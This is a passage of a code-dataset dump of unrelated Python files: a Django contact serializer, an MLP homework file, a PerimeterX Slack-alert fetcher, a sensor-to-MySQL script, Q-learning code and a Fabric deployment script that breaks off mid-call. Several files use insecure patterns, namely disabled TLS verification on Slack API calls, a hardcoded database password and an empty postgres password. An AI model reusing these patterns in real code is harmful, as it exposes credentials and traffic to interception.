:\n\t\t\tdata1.ix[index1,'Cabin'] = str('N/A')\n\n\tdata.to_csv('data/test_6.csv',mode = 'w',index = False)\n\tdata1.to_csv('data/train_6.csv',mode = 'w',index = False)","sub_path":"rel_sur.py","file_name":"rel_sur.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571257906","text":"'''\nSerializers for Contact.\n'''\nimport re\nimport json\nimport copy\nimport datetime\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db import transaction\nfrom django.db.models import F\n\nfrom rest_framework import serializers\n\nfrom .models import (Contact, Address, Number, Email, )\nfrom entity.models import Entity\nfrom core.mixins.queryfields import SerializerFieldsMixin\n\n\nclass ShipToDataField(serializers.JSONField):\n\n def validate(self, value):\n return re.findall(r\"(2[0-3]|[01][0-9]):([0-5][0-9])\", value) if value else []\n\n def to_internal_value(self, data):\n errors = {}\n if not data:\n errors = {'start_time': _(\"This field is required\"), 'end_time': _(\n \"This field is required\")}\n else:\n if data['start_time'] and not self.validate(data['start_time']):\n errors['start_time'] = _(\"Invalid Syntax\")\n elif not data['start_time']:\n errors['start_time'] = _(\"This field is required\")\n\n if data['end_time'] and not self.validate(data['end_time']):\n errors['end_time'] = _(\"Invalid Syntax\")\n elif not data['end_time']:\n errors['end_time'] = _(\"This field is required\")\n\n if errors:\n raise serializers.ValidationError(errors)\n return data\n\n\nclass AddressSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n address_type = None\n id = serializers.IntegerField(required=False)\n\n def __init__(self, *args, **kwargs):\n if kwargs.get('address_type'):\n self.address_type = kwargs.pop('address_type')\n super().__init__(*args, **kwargs)\n # if self.address_type == \"shipto\": #removed for new signup journey\n # self.fields['data'] = ShipToDataField()\n\n class Meta:\n model = Address\n default_fields = ('id', 'address', 'city')\n fields = ('id', 'address', 'city', 'postal_code',\n 'state', 'country', 'data', 'address_type')\n\n\nclass NumberSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = Number\n default_fields = ('id')\n fields = ('id', 'number', 'number_type', )\n\n def validate(self, validated_data):\n if not validated_data:\n raise serializers.ValidationError(\n {'number': _(\"This field may not be blank.\")})\n if validated_data.get('number_type') == 'main' and validated_data.get('number') == '':\n raise serializers.ValidationError(\n {'number': _(\"This field may not be blank.\")})\n return validated_data\n\n\nclass EmailSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n def validate(self, validated_data):\n if not validated_data or validated_data.get('email') == '':\n raise serializers.ValidationError(\n {'email': _(\"This field is required.\")})\n return validated_data\n\n class Meta:\n model = Email\n default_fields = ('id')\n fields = ('id', 'email', )\n\n\nclass ContactSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if kwargs.get('data', {}) and kwargs.get('data', {}).get('contact_type') == Contact.CONTACT_TYPE_BUYER_SHIP_TO:\n self.fields['addresses'] = AddressSerializer(\n many=True, address_type=\"shipto\")\n if kwargs.get('data', {}) and kwargs.get('data', {}).get('contact_type') in [\n Contact.CONTACT_TYPE_BUYER_MAIN_CONTACT_PERSON, Contact.CONTACT_TYPE_BUYER_LOCATION, Contact.CONTACT_TYPE_BUYER_SHIP_TO\n ]:\n self.fields['name'] = serializers.CharField(\n max_length=128, allow_null=False)\n self.fields['name'].error_messages['blank'] = 'This field may not be blank.'\n\n addresses = AddressSerializer(many=True, required=False)\n numbers = NumberSerializer(many=True, required=False)\n emails = EmailSerializer(many=True, required=False)\n\n def validate_related_records(self, records, model, field):\n if self.instance:\n pks = [record.get('id') for record in records if record.get('id')]\n existing_pks = list(model.objects.select_related('contact').filter(\n pk__in=pks, contact=self.instance).values_list('id', flat=True))\n if set(pks) != set(existing_pks):\n raise serializers.ValidationError([{\n \"detail\": _(\"Not found.\")\n } if (record.get('id') and record.get('id') not in existing_pks) else {} for record in records])\n return records\n\n def validate_emails(self, records):\n return self.validate_related_records(records, Email, \"emails\")\n\n def validate_addresses(self, records):\n return self.validate_related_records(records, Address, \"addresses\")\n\n def validate_numbers(self, records):\n return self.validate_related_records(records, Number, \"numbers\")\n\n def save_warehouse_contact(self, instance, contact, ship_to_data):\n\n if instance:\n numbers, emails, addresses = [ids.pop('id') if ids.get('id') else None for ids in ship_to_data['numbers']], [ids.pop(\n 'id') if ids.get('id') else None for ids in ship_to_data['emails']], [ids.pop('id') if ids.get('id') else None for ids in ship_to_data['addresses']]\n\n ship_to_data['contact_type'] = 'buyer:ship_to'\n ship_to_data.pop('data')\n if ship_to_data.get('addresses', None) and not ship_to_data.get('addresses')[0].get('data'):\n ship_to_data['addresses'][0]['data'] = {\n 'start_time': '00:00', 'end_time': '00:00'}\n ship_to_data['addresses'][0]['address_type'] = 'ship_to'\n ship_to = self.create(ship_to_data)\n Contact.objects.filter(pk=contact.id).update(\n data={'is_ship_to': True, 'ship_to_id': ship_to.id})\n\n return ship_to\n\n def validate(self, validated_data):\n contact_msg = {\n Contact.CONTACT_TYPE_BUYER_LOCATION: 'retail',\n Contact.CONTACT_TYPE_BUYER_SHIP_TO: 'warehouse/ship to'\n }\n\n contact_type = self.instance.contact_type if self.instance else validated_data.get(\n 'contact_type')\n if validated_data.get('addresses', None):\n for address in validated_data.get('addresses'):\n existing_address = Address.objects.filter(signature='{}-{}-{}-{}'.format(\n self.context['of_type'].id, self.context['of_id'], contact_type, address.get('postal_code')))\n\n if existing_address.exists():\n if 'id' not in address or address.get('id') != existing_address.first().id:\n raise serializers.ValidationError(\n {'addresses': [\n {'address': 'The address you entered is already associated with a ' +\n contact_msg[contact_type]+' location. Please enter a different address.'}\n ]}\n )\n\n return validated_data\n\n @transaction.atomic\n def create(self, validated_data):\n ship_to_data = copy.deepcopy(validated_data)\n\n def save_related(contact, records, model):\n if not records:\n return\n if model == Address:\n model.objects.bulk_create([\n model(contact=contact, signature='{}-{}-{}-{}'.format(self.context['of_type'].id, self.context['of_id'], contact.contact_type, record.get('postal_code')), **record) for record in records\n ])\n\n else:\n model.objects.bulk_create([\n model(contact=contact, **record) for record in records\n ])\n\n emails = validated_data.pop(\n 'emails') if 'emails' in validated_data else None\n addresses = validated_data.pop(\n 'addresses') if 'addresses' in validated_data else None\n # if validated_data.get('contact_type') == 'buyer:location' and addresses:\n # addresses[0].pop('data')\n numbers = validated_data.pop(\n 'numbers') if 'numbers' in validated_data else None\n\n contact = super().create(validated_data)\n save_related(contact, emails, Email)\n save_related(contact, addresses, Address)\n save_related(contact, numbers, Number)\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data', None) and validated_data.get('data', None).get('is_ship_to') and not validated_data.get('data').get('ship_to_id', None):\n contact = self.save_warehouse_contact(\n '', contact, ship_to_data)\n return contact\n\n @transaction.atomic\n def update(self, instance, validated_data):\n ship_to_data = copy.deepcopy(validated_data)\n\n def save_related(contact, records, model):\n if records is None:\n return\n pks = [record.get('id') for record in records if 'id' in record]\n model.objects.select_related('contact').filter(\n contact=contact).exclude(id__in=pks).delete()\n to_create = []\n\n for record in records:\n if 'id' not in record:\n if model == Address:\n to_create.append(model(contact=contact, signature='{}-{}-{}-{}'.format(\n self.context['of_type'].id, self.context['of_id'], contact.contact_type, record.get('postal_code')), **record))\n else:\n to_create.append(model(contact=contact, **record))\n else:\n if model == Address:\n model.objects.filter(\n pk=record.get('id')).update(signature='{}-{}-{}-{}'.format(self.context['of_type'].id, self.context['of_id'], contact.contact_type, record.get('postal_code')), **record)\n else:\n model.objects.filter(\n pk=record.get('id')).update(**record)\n if to_create:\n model.objects.bulk_create(to_create)\n\n emails = validated_data.pop(\n 'emails') if 'emails' in validated_data else None\n addresses = validated_data.pop(\n 'addresses') if 'addresses' in validated_data else None\n # if validated_data.get('contact_type') == 'buyer:location' and addresses is not None:\n # addresses[0].pop('data')\n numbers = validated_data.pop(\n 'numbers') if 'numbers' in validated_data else None\n contact = super().update(instance, validated_data)\n\n if emails is not None:\n save_related(contact, emails, Email)\n\n if addresses is not None:\n save_related(contact, addresses, Address)\n\n if numbers is not None:\n save_related(contact, numbers, Number)\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data') and validated_data.get('data').get('is_ship_to') == False and validated_data.get('data').get('ship_to_id', None):\n\n Contact.objects.filter(id=validated_data.get(\n 'data').get('ship_to_id')).delete()\n\n contact.data = {}\n contact.save()\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data') and validated_data.get('data').get('is_ship_to') and not validated_data.get('data').get('ship_to_id', None):\n contact = self.save_warehouse_contact(\n instance, contact, ship_to_data)\n return contact\n\n class Meta:\n model = Contact\n fields = ('id', 'name', 'contact_type', 'data',\n 'addresses', 'numbers', 'emails')\n default_fields = ('id', 'name', 'contact_type')\n expandable_fields = {\n 'addresses': (AddressSerializer, (), {'many': True, 'required': False}),\n 'numbers': (NumberSerializer, (), {'many': True, 'required': False}),\n 'emails': (EmailSerializer, (), {'many': True, 'required': False}),\n }\n","sub_path":"src/contact/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":12374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"634973399","text":"import numpy as np\nimport loglinear as ll\nimport config\n\nSTUDENT={'name': 'SHAHAR SIEGMAN',\n 'ID': '011862141'}\n\ndef layer_output(x,params):\n # calculates the output of a layer of the form\n # a = tanh(z) = tanh(xW+b)\n W, b = params\n a = np.tanh(np.dot(x,W)+b)\n return a\n\ndef classifier_output(x, params):\n # calculation is done in 2 stages\n # we need to feed-forward from x to x1\n # then solve x1 with loglinear.predict\n W, b, U, b_prime = params\n x1 = layer_output(x, (W,b))\n probs = ll.classifier_output(x1,(U,b_prime))\n return probs\n\ndef predict(x, params):\n \"\"\"\n params: a list of the form [W, b, U, b_tag]\n \"\"\"\n return np.argmax(classifier_output(x, params))\n\ndef loss_and_gradients(x, y, params):\n \"\"\"\n params: a list of the form [W, b, U, b_tag]\n\n returns:\n loss,[gW, gb, gU, gb_tag]\n\n loss: scalar\n gW: matrix, gradients of W\n gb: vector, gradients of b\n gU: matrix, gradients of U\n gb_tag: vector, gradients of b_tag\n \"\"\"\n\n W, b, U, b_tag = params\n out_dim = U.shape[1]\n # first, do the entire feedforward\n \n shape_b = b.shape\n if len(shape_b)==1:\n if config.debug:\n print(\"b should be a 2d array, actual shape: {}\".format(shape_b))\n b = np.array(b,np.double, ndmin=2)\n\n a2 = layer_output(x,[W,b]) \n z3 = np.dot(a2,U) + b_tag\n y_hat = ll.softmax(z3)\n\n y_e = ll.to_one_hot_row(y,out_dim)\n\n y_diff = y_hat - y_e\n \n #print(\"feedforward complete.\")\n # now we can use backprop\n gU = np.dot(a2.transpose(), y_diff )\n gb_tag = y_diff.copy()\n\n delta2 = np.dot(y_diff, U.T) \n delta2 = delta2 * (1-a2 ** 2)\n\n gW = np.dot(x.transpose(), delta2)\n gb = delta2\n\n loss = ll.logloss(y_e, y_hat)\n return loss,[gW, gb, gU, gb_tag]\n\n \n\ndef create_classifier(in_dim, hid_dim, out_dim):\n \"\"\"\n returns the parameters for a multi-layer perceptron,\n with input dimension in_dim, hidden dimension hid_dim,\n and output dimension out_dim.\n\n return:\n a flat list of 4 elements, W, b, U, b_tag.\n \"\"\"\n W = np.zeros((in_dim,hid_dim), np.double)\n b = np.zeros((1,hid_dim), np.double)\n U = np.zeros((hid_dim,out_dim), np.double)\n b_tag = np.zeros((1,out_dim), np.double)\n return [W,b,U, b_tag]\n\n","sub_path":"NLP-courses/89687-DL/Assignment1/code/mlp1.py","file_name":"mlp1.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11150009","text":"'''\nA helper script to scrape and format the individual results from nested folders.\n\nWritten by RL for the RACC_NR project.\n\n12/8/2018\n'''\n\nimport os\nimport pandas as pd\nimport argparse\nimport warnings\n\ncn = ['training_prob','testing_prob','file_type','joint_matrix','mariginal_prediction','marginal_labels','mutual_information']\nresult_df = pd.DataFrame(columns=cn)\n\n# suppress all warnings\nwarnings.filterwarnings(\"ignore\")\n\n# function to save the dataframe\ndef output_file(df, filen, output_path):\n outputname = filen+\".csv\"\n if len(df) > 0:\n df.to_csv(output_path+outputname,sep=',', na_rep=\" \", encoding='utf-8', index_label=False, index=False) \n print(\"Length of the dataframe:\"+str(len(df)))\n print(\"Results have been saved under \"+output_path+\" as \"+filen)\n\nparser = argparse.ArgumentParser(\n description='RACC_NR U-Net data aggregation script')\nparser.add_argument('--p', required=True,\n metavar=\"/path/to/dataset/\",\n help='Path to the saved folder (root, containing all the result files)')\nargs = parser.parse_args()\ndir_path = args.p\n\n# force the path to end with /\nif dir_path[-1] != '/':\n dir_path += '/'\n\n# full walking on the folder\nfor root, dirs, files in os.walk(dir_path):\n for file_ in files:\n full_path = os.path.join(root, file_)\n full_path_elem = full_path.split('/')\n if 'test_summary.txt' in full_path_elem[-1]:\n # found the summary file\n with open(full_path, 'r') as f:\n data = f.read()\n data_split = data.split('\\n')\n train_prob_convert = full_path_elem[-4].split('_')[1].replace('p','.')\n test_prob_convert = full_path_elem[-3].split('_')[1].replace('p','.')\n df = pd.DataFrame([[train_prob_convert,test_prob_convert,full_path_elem[-2],data_split[1]+'\\n'+data_split[2],data_split[4],data_split[6],data_split[-1]]],columns=cn)\n result_df = pd.concat([result_df, df], ignore_index=True)\n \n# once finish, output the dataframe \noutput_file(result_df, 'RACC_NR_result',dir_path)","sub_path":"Aggregate_results.py","file_name":"Aggregate_results.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217538700","text":"import requests\n\nCD_MSG_TITLE = 'Code Defender has detected a new incident'\n\nclass PerimeterXManagerException(Exception):\n \"\"\" General Exception for PerimeterX manager \"\"\"\n pass\n\nclass PerimeterXManager(object):\n\n def __init__(self, slack_channel=None, slack_api_key=None, connector_type=None, offset_in_ms=0):\n self.slack_channel = slack_channel\n self.slack_api_key = slack_api_key\n self.slack_offset = self.convert_offset(offset_in_ms)\n self.connector_type = connector_type\n self.slack_cursor = ''\n self.paginated = False\n self.messages = []\n\n\n \"\"\" Siemplify cannot store microseconds like Slack requires\n so we take the offset_in_ms turn it into microseconds with *10000\n Next, we need to add a single microsecond to avoid a loop with the +1\n Finally, we /1000000 to generate the time format required for the slack API \n If the offset is 0, then we just use 0\"\"\"\n def convert_offset(self, ms):\n if(ms == 0):\n return ms\n return float(((ms*10000)+1)/1000000)\n\n\n def get_slack_channel_id(self):\n response = requests.get(\n 'https://slack.com/api/conversations.list',\n headers={'Authorization': 'Bearer ' + self.slack_api_key}\n )\n # curl -H 'Authorization: Bearer slack_api_key' https://slack.com/api/conversations.list\n # foreach channels if name == slack_channel, then return id\n if response.status_code != 200:\n return False\n\n json_response = response.json()\n\n # check to make sure we've got a channels array\n if 'channels' not in json_response:\n return False\n\n # check to make sure the channels is a list\n if type(json_response['channels']) != list:\n return False\n\n # step through the channels looking for the one we want\n for x in json_response['channels']:\n # if this is the channel we want then return the id\n if x['name'] == self.slack_channel:\n return x['id']\n\n return False\n\n\n def f(self, x):\n return {\n 'slack': self.get_slack_messages()\n }.get(x, False)\n\n\n def getItemFromList(self, list, searchItem, searchValue, returnValue):\n for x in list:\n if x[searchItem] == searchValue:\n return x[returnValue]\n return False\n\n\n def before(self, value, a):\n # Find first part and return slice before it.\n pos_a = value.find(a)\n if pos_a == -1: return value\n return value[0:pos_a]\n\n\n def formatSlackMsg(self, msg):\n return {\n 'type': 'slack',\n 'ts': msg['ts'],\n 'text': self.before(msg['attachments'][0]['text'], '\\n'),\n 'fullText': msg['attachments'][0]['text'],\n 'title': msg['attachments'][0]['title'],\n 'severity': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Risk Level', 'value'),\n 'script': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Script', 'value'),\n 'domain': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Host Domain', 'value'),\n 'deepLink': self.getItemFromList(msg['attachments'][0]['actions'], 'text', 'View in Console', 'url')\n }\n\n\n def get_slack_messages(self):\n channelId = self.get_slack_channel_id()\n\n if channelId == False:\n return False\n\n response = requests.get(\n 'https://api.slack.com/api/conversations.history',\n verify=False,\n params={'channel': channelId, 'limit': 100, 'cursor': self.slack_cursor, 'oldest': self.slack_offset},\n headers={'Authorization': 'Bearer ' + self.slack_api_key}\n )\n\n if response.status_code != 200:\n return False\n\n json_response = response.json()\n\n if json_response['has_more'] == True:\n self.pagination = 1\n self.slack_cursor = json_response['response_metadata']['next_cursor']\n else:\n self.pagination = 0\n self.slack_cursor = ''\n\n if 'messages' not in json_response:\n return False\n\n # Check to make sure we got some messages returned\n if json_response['messages'] == False:\n return False\n\n # Check to make sure there's messages in the list\n if len(json_response['messages']) < 1:\n return False\n\n # walk through our retrieved messages to find CD related entries\n for x in json_response['messages']:\n # Check for a Code Defender specific message\n if x['type'] == 'message' and 'attachments' in x and x['attachments'][0]['title'] == CD_MSG_TITLE:\n self.messages.append(self.formatSlackMsg(x))\n\n if self.pagination == 1:\n self.get_slack_messages()\n\n return self.messages\n\n\n def get_cd_alerts(self, integrationType):\n # Execute the desired message retrieval\n return self.f(integrationType)\n\n\n def get_connector_type(self):\n return self.connector_type\n \n \n def auth(self):\n response = requests.post(\n 'https://slack.com/api/auth.test',\n headers={'Authorization': 'Bearer ' + self.slack_api_key}\n )\n if response.status_code != 200:\n return False\n\n json_response = response.json()\n if 'ok' in json_response and json_response['ok'] == True:\n return True\n\n if 'ok' in json_response and json_response['ok'] == False:\n return False\n\n return False\n","sub_path":"PerimeterXManager.py","file_name":"PerimeterXManager.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214306009","text":"import pymysql\nimport Adafruit_DHT\n\nDHT_PIN = 26\nDHT_TYPE = Adafruit_DHT.DHT11\n\ndb = pymysql.connect(host='localhost',\n port=3306,\n user='root',\n password='1234',\n db='raspiDBK',\n charset='utf8')\n\nhum, temp = Adafruit_DHT.read_retry(DHT_TYPE, DHT_PIN)\nif hum is not None and temp is not None:\n print('Temp = (0:0.1f)*C Humidity =(1:0.1f)%'.format(temp,hum))\n with db.cursor() as cur:\n sql = \"\"\"insert into sensor(time, hum, temp, illum)\n values (now(), %s, %s, 0)\"\"\"\n print(sql)\n cur.execute(sql, (hum,temp))\n db.commit()\n\n with db.cursor() as cur:\n sql=\"select * from sensor\"\n cur.execute(sql)\n rows = cur.fetchall()\n for row_data in rows:\n print(row_data)\n\nelse:\n print(\"nope\")\n","sub_path":"dht_db.py","file_name":"dht_db.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"209416077","text":"import sys\nsys.path.append('../../') \nimport algorithms.TD.Q_learning_SARSAMAX as TDiter \nimport gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom statistics import mean\nimport pandas as pd\nimport seaborn as sns\n\nENV_NAME = 'FrozenLake-v0'\n\ndef play_game_with_policies(env_name, list_of_Qs, output_file_path):\n \"\"\"This function takes an environment, and a list of policies\n which it wants to compare performance between on this environment.\"\"\"\n iteration_num = 0\n env = gym.make(env_name)\n policy_average_rewards = []\n policy_names=[]\n for Q_func in list_of_Qs:\n policy_name = 'iteration_'+str(iteration_num)\n policy_names.append(policy_name)\n rewards_by_episode = []\n for episode in range(500):\n state = env.reset()\n done = False\n episode_reward = 0\n while not done:\n next_action = np.argmax(Q_func[state])\n state, reward, done, info = env.step(next_action) \n episode_reward += reward\n rewards_by_episode.append(episode_reward)\n iteration_num+=1\n policy_average_rewards.append(mean(rewards_by_episode))\n plt.title('Average Reward by Policy')\n bars = plt.bar(policy_names, policy_average_rewards)\n for bar in bars:\n yval = bar.get_height()\n plt.text(bar.get_x(), yval + .005, yval)\n plt.savefig(fname=output_file_path)\n\nif __name__ == '__main__':\n\n # Create your environment\n env = gym.make(ENV_NAME)\n env.reset()\n\n # Create policy iterator object\n policy_iterator = TDiter.TD_off_policy(env=env,\n discount_factor=1,\n learning_rate=0.1,\n lambda_value=0.1)\n\n\n # Call iterate function and get all the policies iterated through\n list_of_Qs = policy_iterator.iterate(iteration_loops=100001,\n print_every_n=10000,\n eval_episodes=1,\n epsilon_soft=0.1)\n print('''Check these Qs to make sure they are sufficiently different!\n{}'''.format(list_of_Qs))\n\n # Play game with generated policies and save results!\n play_game_with_policies(env_name=ENV_NAME,\n list_of_Qs=list_of_Qs,\n output_file_path='outputs/policy_iter_Q_learning_TD_off.png')\n\n","sub_path":"implementations/examples/frozen_lake/TD_off_policy_Q_learning.py","file_name":"TD_off_policy_Q_learning.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44031234","text":"import sys\nimport string\n\ndef op(a, b):\n \"\"\"This function compute the five basic operations (+, -, x, :, %) on its 2 int input args\"\"\"\n tab = [0, 0, 0, 0, 0]\n tab[0] = a + b\n tab[1] = a - b\n tab[2] = a * b\n if b == 0:\n tab[3] = \"ERROR (div by zero)\"\n else:\n tab[3] = a / b\n if b == 0:\n tab[4] = \"ERROR (modulo by zero)\"\n else:\n tab[4] = a % b\n print(\"Sum: {}\\nDiff: {}\\nProduct: {}\\nQuotient: {}\\nReminder: {}\".format(tab[0], tab[1], tab[2], tab[3], tab[4]))\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"usage: python operations.py [operands]\\nexample:\\n\\tpython operations.py 10 3\")\n elif not sys.argv[1].isnumeric() or not sys.argv[2].isnumeric():\n print(\"InputError: only number\")\n else:\n op(int(sys.argv[1]), int(sys.argv[2]))\n \n","sub_path":"day00/ex04/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191902118","text":"# Marcelo Campos de Medeiros\n# ADS UNIFIP\n# Estrutura de Repetição\n# 25/03/2020\n\n'''\n33- O Departamento Estadual de Meteorologia lhe contratou para desenvolver\num programa que leia as um conjunto indeterminado de temperaturas,\ne informe ao final a menor e a maior temperaturas informadas,\nbem como a média das temperaturas.\n'''\n\nprint('=' * 40)\nprint('{:=^40}'.format(\" 'PROGRAMA QUE LEIA TEMPERATURAS' \"))\nprint('=' * 40, '\\n')\n\nnum = int(input('Quantas temperaturas vai informar: '))\n\nmaior = 0\nmenor = 0\nsoma = 0\nfor c in range(1, num +1):\n temp = float(input(f'Qual a {c}° temperatura: '))\n soma += temp\n if c == 1:\n maior = temp\n menor = temp\n if temp > maior:\n maior = temp\n if temp < menor:\n menor = temp\nprint(f'A maior temperatura é {maior}\\n'\n f'A menor temperatua é {menor}\\n'\n f'A média da temperatuta é {soma / num}')\n","sub_path":"exerc_33.py","file_name":"exerc_33.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"179848690","text":"#!/bin/python\n# ~/fabfile.py\n# A Fabric file for carrying out various administrative tasks.\n# Tim Sutton, Jan 2013\n\n# To use this script make sure you have fabric and fabtools.\n# pip install fabric fabtools\n\nimport os\nimport getpass\n\nfrom fabric.api import task, env, fastprint, cd, run, sudo, local, prompt\nfrom fabric.contrib.project import rsync_project\nfrom fabric.contrib.files import exists, sed\nfrom fabric.colors import red, blue, green\nfrom fabtools import require\nfrom fabtools.deb import update_index\n# Don't remove even though its unused\n# noinspection PyUnresolvedReferences\nfrom fabtools.vagrant import vagrant\n\n# noinspection PyUnresolvedReferences\nfrom fabgis.dropbox import setup_dropbox, setup_dropbox_daemon\nfrom fabgis.django import setup_apache, build_pil, set_media_permissions\nfrom fabgis.git import update_git_checkout\nfrom fabgis.virtualenv import setup_venv\nfrom fabgis.common import setup_env, show_environment\nfrom fabgis.postgres import (\n create_user,\n get_postgres_dump,\n restore_postgres_dump,\n setup_postgis_2,\n create_postgis_2_template)\n\n\ndef get_vars():\n \"\"\"Helper method to get standard deployment vars.\n\n :returns: A tuple containing the following:\n * base_path: Workspace dir e.g. ``/home/foo/python``\n * code_path: Project dir e.g. ``/home/foo/python/visual_changelog``\n * git_url: Url for git checkout - use http for read only checkout\n * repo_alias: Name of checkout folder e.g. ``visual_changelog``\n * site_name: Name for the web site e.g. ``visual_changelog``\n\n :rtype: tuple\n \"\"\"\n setup_env()\n site_name = 'visual_changelog'\n base_path = os.path.abspath(os.path.join(\n env.fg.home, 'dev', 'python'))\n git_url = 'http://github.com/timlinux/visual_changelog.git'\n repo_alias = 'visual_changelog'\n code_path = os.path.abspath(os.path.join(base_path, repo_alias))\n return base_path, code_path, git_url, repo_alias, site_name\n\n@task\ndef update_venv(code_path):\n \"\"\"Update the virtual environment to ensure it has node etc. installed.\n\n :param code_path: Directory in which project is located.\n :type code_path: str\n\n e.g.::\n\n fab -H localhost update_venv:/home/timlinux/dev/python/visual_changelog\n \"\"\"\n setup_venv(code_path, requirements_file='REQUIREMENTS.txt')\n #yuglify needed by django-compress needs to have node installed which\n # is provided by virtual-node in the REQUIREMENTS file above,\n # but we still need to install yuglify manually since we cant add it\n # using REQUIREMENTS.\n # See also https://github.com/elbaschid/virtual-node\n # for more info on how virtualnode works\n with cd(code_path):\n run('venv/bin/npm -g install yuglify')\n build_pil(code_path)\n\n\n@task\ndef setup_postgres_user():\n \"\"\"Set up the postgresql instance.\"\"\"\n create_user('wsgi', '')\n\n@task\ndef upload_postgres_dump(dump_path):\n \"\"\"Upload the dump found in dump_path and restore it to the server.\n\n .. note existing data on the server will be destroyed.\n\n :param dump_path: Local file containing dump to be restored.\n :type dump_path; str\n \"\"\"\n restore_postgres_dump(\n 'changelog',\n user='wsgi',\n password='',\n ignore_permissions=True,\n file_name=dump_path)\n\n\n@task\ndef update_apache():\n \"\"\"Update the apache configuration prompting for github account info.\n\n .. note:: The config file is taken from the local system.\n\n \"\"\"\n code_path = os.path.dirname(__file__)\n\n git_url = 'https://api.github.com/repos/timlinux/visual_changelog/issues'\n git_user = prompt(\n 'Please enter the github user account that issues submitted via the\\n'\n 'web ui should be created as. This will be written into the apache\\n'\n 'configuration file under /etc/apache2/sites-available so you\\n'\n 'should take appropriate security measures.\\nUser :\\n')\n git_password = getpass.getpass()\n domain = 'changelog.linfiniti.com'\n setup_apache(\n site_name='visual_changelog',\n code_path=code_path,\n domain=domain,\n github_url=git_url,\n github_password=git_password,\n github_user=git_user)\n\n\n@task\ndef deploy():\n \"\"\"Initialise or update the git clone - you can safely rerun this.\n\n e.g. to update the server\n\n fab -H deploy\n\n \"\"\"\n # Ensure we have a mailserver setup for our domain\n # Note that you may have problems if you intend to run more than one\n # site from the same server\n setup_env()\n show_environment()\n setup_postgis_2()\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n\n fastprint('Checking out %s to %s as %s' % (git_url, base_path, repo_alias))\n update_git_checkout(base_path, git_url, repo_alias)\n update_index()\n require.postfix.server(site_name)\n update_apache(code_path, site_name)\n require.deb.package('libpq-dev')\n require.deb.package('libgeos-c1')\n require.deb.package('vim')\n update_venv(code_path)\n with cd(os.path.join(code_path, 'django_project')):\n run('../venv/bin/python manage.py syncdb --noinput ')\n run('../venv/bin/python manage.py migrate')\n set_db_permissions()\n # if we are testing under vagrant, deploy our local media and db\n if 'vagrant' in env.fg.home:\n with cd(code_path):\n run('cp /vagrant/visual_changelog.db .')\n run('touch django_project/core/wsgi.py')\n\n sync_media_to_server()\n collectstatic()\n fastprint('*******************************************\\n')\n fastprint(red(' Don\\'t forget set ALLOWED_HOSTS in '))\n fastprint(' django_project/core/settings/prod.py')\n fastprint(' to the domain name for the site.')\n fastprint('*******************************************\\n')\n\n\n@task\ndef freshen():\n \"\"\"Freshen the server with latest git copy and touch wsgi.\n\n .. note:: Preferred normal way of doing this is rather to use the\n sync_project_to_server task and not to checkout from git.\n\n \"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n git_url = 'http://github.com/timlinux/visual_changelog.git'\n update_git_checkout(base_path, git_url, repo_alias)\n with cd(os.path.join(code_path, 'django_project')):\n run('touch core/wsgi.py')\n collectstatic()\n\n fastprint('*******************************************\\n')\n fastprint(red(' Don\\'t forget set ALLOWED_HOSTS in \\n'))\n fastprint(' django_project/core/settings/prod.py\\n')\n fastprint(' to the domain name for the site.\\n')\n fastprint('*******************************************\\n')\n\n@task\ndef sync_media_to_server():\n \"\"\"Sync media to server from local filesystem.\"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n remote_path = os.path.join(code_path, 'django_project', 'media')\n local_path = os.path.join(\n os.path.dirname(__file__), 'django_project', 'media/')\n rsync_project(\n remote_path,\n local_dir=local_path,\n exclude=['*.pyc', '*.py', '.DS_Store'])\n\n # Now our sqlite db\n remote_path = os.path.join(\n code_path, 'resources', 'sqlite', 'visual_changelog.db')\n local_path = os.path.join(\n os.path.dirname(__file__), 'resources/sqlite/visual_changelog.db')\n rsync_project(\n remote_path,\n local_dir=local_path,\n exclude=['*.pyc', '*.py', '.DS_Store'])\n set_media_permissions(code_path)\n set_db_permissions()\n\n\n@task\ndef sync_project_to_server():\n \"\"\"Synchronize project with webserver ignoring venv and sqlite db..\n This is a handy way to get your secret key to the server too...\n\n \"\"\"\n base_path, code_path, git_url, repo_alias, site_name = get_vars()\n rsync_project(\n 